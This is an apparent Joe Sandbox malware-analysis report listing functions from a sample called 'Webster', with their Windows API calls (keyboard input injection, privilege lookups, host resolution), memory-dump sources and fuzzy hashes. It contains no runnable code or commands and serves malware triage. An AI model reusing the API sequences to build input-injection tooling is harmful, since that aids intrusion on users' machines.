                                                                                  Function 00AE1410 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00AE1465
                                                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 00AE1481
                                                                                  • PostMessageW.USER32(00000000,00000101,00000000), ref: 00AE14E0
                                                                                  • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00AE1532
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                  • String ID:
                                                                                  • API String ID: 432972143-0
                                                                                  • Opcode ID: 2723c7f5ea06764e657ba19d1fe5224b634d61c32ec4db536f9111b170e449ac
                                                                                  • Instruction ID: df67a6f7632f9aa601fe28f795501dbc7da2bc49ec7c99405d3ca878ec3d1453
                                                                                  • Opcode Fuzzy Hash: 2723c7f5ea06764e657ba19d1fe5224b634d61c32ec4db536f9111b170e449ac
                                                                                  • Instruction Fuzzy Hash: 10317BB09402A85EFF348B678C04BFEBBB6AB95310F48831AE491522D1C3788DC18B61
                                                                                  Function 00AB63F5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00AB642B
                                                                                  • __isleadbyte_l.LIBCMT ref: 00AB6459
                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00AB6487
                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00AB64BD
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                  • String ID:
                                                                                  • API String ID: 3058430110-0
                                                                                  • Opcode ID: 692f599e26266c83300aa994ed8d2768cbeadf68d7f245888315f732168092b3
                                                                                  • Instruction ID: 62e76cb6dd5e82742e97081ef8294711c1275487791356a26e53cd869b1ea122
                                                                                  • Opcode Fuzzy Hash: 692f599e26266c83300aa994ed8d2768cbeadf68d7f245888315f732168092b3
                                                                                  • Instruction Fuzzy Hash: 5031D031600A56AFDB218F65CE44BEB7FA9FF41320F154429F82487192DB39E890DB50
                                                                                  Function 00B0552B Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetForegroundWindow.USER32 ref: 00B0553F
                                                                                    • Part of subcall function 00AE3B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00AE3B4E
                                                                                    • Part of subcall function 00AE3B34: GetCurrentThreadId.KERNEL32 ref: 00AE3B55
                                                                                    • Part of subcall function 00AE3B34: AttachThreadInput.USER32(00000000,?,00AE55C0), ref: 00AE3B5C
                                                                                  • GetCaretPos.USER32(?), ref: 00B05550
                                                                                  • ClientToScreen.USER32(00000000,?), ref: 00B0558B
                                                                                  • GetForegroundWindow.USER32 ref: 00B05591
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                  • String ID:
                                                                                  • API String ID: 2759813231-0
                                                                                  • Opcode ID: 2e51fff592a9ecbc4596a4b972ea4d1558d244a7e492ef5c424b4e085569f85e
                                                                                  • Instruction ID: 547d2c92f03cf5fd209cfb0438719ef9ce8690fa5e3202a2b3105c044771fe25
                                                                                  • Opcode Fuzzy Hash: 2e51fff592a9ecbc4596a4b972ea4d1558d244a7e492ef5c424b4e085569f85e
                                                                                  • Instruction Fuzzy Hash: C4313C72900109AFDB10EFB5CD859EFB7F9EF98304F10406AE515E7241EA75AE408BA0
                                                                                  Function 00B0CB40 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3
                                                                                  • GetCursorPos.USER32(?), ref: 00B0CB7A
                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00ABBCEC,?,?,?,?,?), ref: 00B0CB8F
                                                                                  • GetCursorPos.USER32(?), ref: 00B0CBDC
                                                                                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00ABBCEC,?,?,?), ref: 00B0CC16
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2864067406-0
                                                                                  • Opcode ID: d4aba9fda0628d54320ffd80144eac5e1ca1404e4d306df11ccf1d542c6b2570
                                                                                  • Instruction ID: 76e8286ce5c8e0554b405d2d7a08e8f64cda754ed7ee127269401dda1d946d52
                                                                                  • Opcode Fuzzy Hash: d4aba9fda0628d54320ffd80144eac5e1ca1404e4d306df11ccf1d542c6b2570
                                                                                  • Instruction Fuzzy Hash: E6318D35600018AFCB259F59C899EFA7FF6EB49310F444199F9059B2B1CB319D51EFA0
                                                                                  Function 00AA0BC0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __setmode.LIBCMT ref: 00AA0BE2
                                                                                    • Part of subcall function 00A9402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00AE7E51,?,?,00000000), ref: 00A94041
                                                                                    • Part of subcall function 00A9402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00AE7E51,?,?,00000000,?,?), ref: 00A94065
                                                                                  • _fprintf.LIBCMT ref: 00AA0C19
                                                                                  • OutputDebugStringW.KERNEL32(?), ref: 00AD694C
                                                                                    • Part of subcall function 00AA4CCA: _flsall.LIBCMT ref: 00AA4CE3
                                                                                  • __setmode.LIBCMT ref: 00AA0C4E
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                  • String ID:
                                                                                  • API String ID: 521402451-0
                                                                                  • Opcode ID: 24135a3c292c16f84bfa9ac03fbc3b397eb2307750ea320042ac5d76e38a86c4
                                                                                  • Instruction ID: 8c0203405aef3ba7ebedaff02d4155e9a5c3c6c3de1495bdf8f82b51a4cceebd
                                                                                  • Opcode Fuzzy Hash: 24135a3c292c16f84bfa9ac03fbc3b397eb2307750ea320042ac5d76e38a86c4
                                                                                  • Instruction Fuzzy Hash: 31110631A041046EDB08BBA4AE46DBE7B6DEF8A321F14015AF204972C2EFA55D5287A1
                                                                                  Function 00AD9274 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00AD8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00AD8D3F
                                                                                    • Part of subcall function 00AD8D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00AD8D49
                                                                                    • Part of subcall function 00AD8D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AD8D58
                                                                                    • Part of subcall function 00AD8D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00AD8D5F
                                                                                    • Part of subcall function 00AD8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AD8D75
                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00AD92C1
                                                                                  • _memcmp.LIBCMT ref: 00AD92E4
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AD931A
                                                                                  • HeapFree.KERNEL32(00000000), ref: 00AD9321
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                  • String ID:
                                                                                  • API String ID: 1592001646-0
                                                                                  • Opcode ID: 1ef0c92a861c0e1d6d70bbbec83e4aedf9764bc6dfa7607e0ac19c4b490d5664
                                                                                  • Instruction ID: ec9f3a1ab67df505105c0809dc48681e2ecea20459a3e5971916aec0bc15e009
                                                                                  • Opcode Fuzzy Hash: 1ef0c92a861c0e1d6d70bbbec83e4aedf9764bc6dfa7607e0ac19c4b490d5664
                                                                                  • Instruction Fuzzy Hash: A4219D31E40109EFDB14DFA5C949BEEB7B8FF44301F14805AE896AB390D770AA44CB90
                                                                                  Function 00B0634E Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00B063BD
                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B063D7
                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B063E5
                                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00B063F3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Long$AttributesLayered
                                                                                  • String ID:
                                                                                  • API String ID: 2169480361-0
                                                                                  • Opcode ID: 3e082759615caa05d0569bdec7e442102e2957c0381a117f8f1a39bafa6af8af
                                                                                  • Instruction ID: 7fc01b417bd9c570663566dbe074768d921ad42addc381b3ee66492b2a4591c2
                                                                                  • Opcode Fuzzy Hash: 3e082759615caa05d0569bdec7e442102e2957c0381a117f8f1a39bafa6af8af
                                                                                  • Instruction Fuzzy Hash: 7511B131305514AFD705BB28DC55FBA7BA9EF45320F148259F916C72D1CBB0AD408B94
                                                                                  Function 00ADE45A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00ADF858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00ADE46F,?,?,?,00ADF262,00000000,000000EF,00000119,?,?), ref: 00ADF867
                                                                                    • Part of subcall function 00ADF858: lstrcpyW.KERNEL32(00000000,?), ref: 00ADF88D
                                                                                    • Part of subcall function 00ADF858: lstrcmpiW.KERNEL32(00000000,?,00ADE46F,?,?,?,00ADF262,00000000,000000EF,00000119,?,?), ref: 00ADF8BE
                                                                                  • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00ADF262,00000000,000000EF,00000119,?,?,00000000), ref: 00ADE488
                                                                                  • lstrcpyW.KERNEL32(00000000,?), ref: 00ADE4AE
                                                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,00ADF262,00000000,000000EF,00000119,?,?,00000000), ref: 00ADE4E2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrcmpilstrcpylstrlen
                                                                                  • String ID: cdecl
                                                                                  • API String ID: 4031866154-3896280584
                                                                                  • Opcode ID: a79c8640b5c5154fd9d8d879607c46de975b0678d53f6d9c1f90d986e3e1a212
                                                                                  • Instruction ID: eb578b434cd8783d312c69188893c99819ee8c5527620e877827c210c23ac7f7
                                                                                  • Opcode Fuzzy Hash: a79c8640b5c5154fd9d8d879607c46de975b0678d53f6d9c1f90d986e3e1a212
                                                                                  • Instruction Fuzzy Hash: 2B115B7A200345AFDB25AF24EC45D7E77A9FF45350B90802BF806CB3A0EB719990D7A1
                                                                                  Function 00AB5312 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 00AB5331
                                                                                    • Part of subcall function 00AA593C: __FF_MSGBANNER.LIBCMT ref: 00AA5953
                                                                                    • Part of subcall function 00AA593C: __NMSG_WRITE.LIBCMT ref: 00AA595A
                                                                                    • Part of subcall function 00AA593C: RtlAllocateHeap.NTDLL(014B0000,00000000,00000001,?,00000004,?,?,00AA1003,?), ref: 00AA597F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap_free
                                                                                  • String ID:
                                                                                  • API String ID: 614378929-0
                                                                                  • Opcode ID: c9de3625ec5d5f1d368bdfa4ee17bfe96945bf26272b30601a791e6d48320007
                                                                                  • Instruction ID: 6e31ab508b04045ff86fd3596f7af2a9eb16409b70777692c590acc54ba3fb11
                                                                                  • Opcode Fuzzy Hash: c9de3625ec5d5f1d368bdfa4ee17bfe96945bf26272b30601a791e6d48320007
                                                                                  • Instruction Fuzzy Hash: CE118232D05A16AFCB243F74AD157DA3AD8AF163A0B10452AF9589F2D2DFB489409790
                                                                                  Function 00AE4365 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00AE4385
                                                                                  • _memset.LIBCMT ref: 00AE43A6
                                                                                  • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00AE43F8
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00AE4401
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                  • String ID:
                                                                                  • API String ID: 1157408455-0
                                                                                  • Opcode ID: 546cac9450196f55561169b5c931287c3f09b19aa6288783cda0a64fdbc7a5dc
                                                                                  • Instruction ID: d73d34f8d635f7e97fb000dcaa4ea876a01425aaccdc0640eb822065869ee46b
                                                                                  • Opcode Fuzzy Hash: 546cac9450196f55561169b5c931287c3f09b19aa6288783cda0a64fdbc7a5dc
                                                                                  • Instruction Fuzzy Hash: 78110A719012287AD7309BA5AC4DFEBBB7CEF49720F00459AF908E72C0D6744E808BA4
                                                                                  Function 00AF6A54 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A9402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00AE7E51,?,?,00000000), ref: 00A94041
                                                                                    • Part of subcall function 00A9402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00AE7E51,?,?,00000000,?,?), ref: 00A94065
                                                                                  • gethostbyname.WSOCK32(?,?,?), ref: 00AF6A84
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00AF6A8F
                                                                                  • _memmove.LIBCMT ref: 00AF6ABC
                                                                                  • inet_ntoa.WSOCK32(?), ref: 00AF6AC7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                  • String ID:
                                                                                  • API String ID: 1504782959-0
                                                                                  • Opcode ID: e0c7b5c80adeb02a3b09bdc1dfae34673fbd0736b6c2c1f87798603fc6b58803
                                                                                  • Instruction ID: 36ad75ea45cbd1dd0baa47a527321eafddc5940f89a51b2aa4e49f9a8e4dc0d3
                                                                                  • Opcode Fuzzy Hash: e0c7b5c80adeb02a3b09bdc1dfae34673fbd0736b6c2c1f87798603fc6b58803
                                                                                  • Instruction Fuzzy Hash: E5116375600109AFCB04FBE4CE86CEEB7B8EF08311B544165F602A72A1DF70AE40CB91
                                                                                  Function 00AD96F9 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00AD9719
                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AD972B
                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AD9741
                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AD975C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  • Opcode ID: b58ec3223e1bfc2dbf1447c9469d3cd7c24b9b6d54bcbf90e2d6c693c9cd7f7c
                                                                                  • Instruction ID: 808076a1add889721b2ec957cf10676d9e702b404cdfb9d470457e8a9fcd1954
                                                                                  • Opcode Fuzzy Hash: b58ec3223e1bfc2dbf1447c9469d3cd7c24b9b6d54bcbf90e2d6c693c9cd7f7c
                                                                                  • Instruction Fuzzy Hash: 75115A39900218FFEB10DF95CD84EDEBBB8FB48710F204092E901B7290D671AE10DB90
                                                                                  Function 00A8166C Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3
                                                                                  • DefDlgProcW.USER32(?,00000020,?), ref: 00A816B4
                                                                                  • GetClientRect.USER32(?,?), ref: 00ABB93C
                                                                                  • GetCursorPos.USER32(?), ref: 00ABB946
                                                                                  • ScreenToClient.USER32(?,?), ref: 00ABB951
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Client$CursorLongProcRectScreenWindow
                                                                                  • String ID:
                                                                                  • API String ID: 4127811313-0
                                                                                  • Opcode ID: 8425e3a6163e85b52fdcf2ca200c9a7a12090b9a0ac3ce0355738885a612a472
                                                                                  • Instruction ID: 6588e0ab5c576a5e2de78e017f8dd9dfdfae46bb9f67b5697dab947b09a90e36
                                                                                  • Opcode Fuzzy Hash: 8425e3a6163e85b52fdcf2ca200c9a7a12090b9a0ac3ce0355738885a612a472
                                                                                  • Instruction Fuzzy Hash: A0112839A10119ABCB10FF54C885DFE77B9FB05300F544466F981E7150EB74BA92CBA1
                                                                                  Function 00A82111 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A8214F
                                                                                  • GetStockObject.GDI32(00000011), ref: 00A82163
                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00A8216D
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
